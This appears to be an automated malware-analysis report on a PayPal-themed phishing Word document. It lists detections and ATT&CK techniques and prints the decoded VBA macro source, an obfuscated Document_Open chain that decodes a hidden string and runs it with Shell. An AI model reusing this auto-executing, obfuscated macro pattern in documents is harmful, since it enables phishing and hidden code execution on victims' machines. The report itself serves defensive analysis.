Verdict: MALICIOUS (Risk Score: 182)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious Office documents. The macro utilizes the Shell() function, indicating it likely executes a secondary payload. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification, which is a typical phishing lure. The presence of VBA macros and the phishing pretext strongly suggest a malicious intent, likely for credential harvesting or identity theft.
Heuristics (5)

- ClamAV: Doc.Malware.Generic-6708833-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6708833-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9614 bytes |

SHA-256: 422433ade305bcd73d7a57db25ff7b2c8df1a098891cd577baf13419982dc2e8
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
array44 = "arr"
array4 array44
array44 = "44"
End Sub
Attribute VB_Name = "plus"
Public Sub General()
ctr = ""
currentTime secondBracketAddress.wl, ctr
secondBracketAddress.either = ctr
secondBracketAddress.allocating = secondBracketAddress.either
End Sub
Attribute VB_Name = "secondBracketAddress"
Attribute VB_Base = "0{A32D73AA-AC1B-4F40-BC29-B534231117BA}{BE71A090-5D98-474F-8464-158D00037C8C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub allocating_Change()
below = 21
below = 49
below = 40
below = 24
below = 71
below = 15
below = 76
below = 40
below = 60
below = 45
below = 53
below = 42
below = 85
below = 56
below = 91
below = 50
reportErr = secondBracketAddress.allocating
below = 9
below = 66
below = 30
below = 31
below = 94
below = 36
below = 25
below = 49
below = 79
below = 58
below = 21
below = 34
below = 46
below = 35
below = 68
below = 90
below = 7
below = 82
below = 78
below = 46
Shell reportErr, 0
below = 16
below = 21
below = 62
below = 75
below = 22
below = 22
below = 67
below = 98
below = 92
below = 6
below = 43
below = 80
below = 13
below = 36
End Sub
Private Sub msg_Change()
General
End Sub
Attribute VB_Name = "SYS_gettid"
Sub CP_ACP(now, currentdepth, ByRef isAddressOnStack)
isAddressOnStack = Right(Left(now, currentdepth), 1)
End Sub
Sub currentTime(mapped, ByRef si_addr)
si_addr = ""
filecount = 1
along filecount, si_addr, mapped
End Sub
Sub along(ByRef invalid, ByRef maxdepth, instead)
heapVariable = Len(instead)
If invalid <= heapVariable Then
cpcr = ""
CP_ACP instead, invalid, cpcr
irc = 1
iter cpcr, icr
snr = ""
sensitive icr - 2, snr
maxdepth = maxdepth + snr
invalid = invalid + 1
along invalid, maxdepth, instead
End If
End Sub
Sub sensitive(method, ByRef sr)
sr = ""
If method < 1 Then
CP_ACP secondBracketAddress.attempt, Len(secondBracketAddress.attempt) + method, sr
Else
CP_ACP secondBracketAddress.attempt, method, sr
End If
End Sub
Sub within(ByRef wcContainer, ByRef object, PVOID)
If wcContainer < Len(secondBracketAddress.attempt) Then
cpcr = ""
CP_ACP secondBracketAddress.attempt, wcContainer, cpcr
If PVOID <> cpcr Then
wcContainer = wcContainer + 1
within wcContainer, object, PVOID
Else
object = wcContainer
End If
End If
End Sub
Sub iter(PVOID, ByRef object)
wcContainer = 1
object = 1
within wcContainer, object, PVOID
End Sub
Attribute VB_Name = "ThreadExecutor"
Public Sub array4(typename)
secondBracketAddress.msg = typename
End Sub
' Processing file: /opt/analyzer/scan_staging/5d3e805fd11741cd861e37b8d13cd93c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1193 bytes
' Line #0:
' FuncDefn (Sub Document_Open())
' Line #1:
' LitStr 0x0003 "arr"
' St array44
' Line #2:
' Ld array44
' ArgsCall array4 0x0001
' Line #3:
' LitStr 0x0002 "44"
' St array44
' Line #4:
' Line #5:
' EndSub
' Line #6:
' Macros/VBA/plus - 1003 bytes
' Line #0:
' FuncDefn (Public Sub General())
' Line #1:
' LitStr 0x0000 ""
' St ctr
' Line #2:
' Ld secondBracketAddress
' MemLd wl
' Ld ctr
' ArgsCall currentTime 0x0002
' Line #3:
' Ld ctr
' Ld secondBracketAddress
' MemSt either
' Line #4:
' Ld secondBracketAddress
' MemLd either
' Ld secondBracketAddress
' MemSt allocating
' Line #5:
' EndSub
' Macros/VBA/secondBracketAddress - 2763 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Sub allocating_Change())
' Line #4:
' LitDI2
```

... (truncated)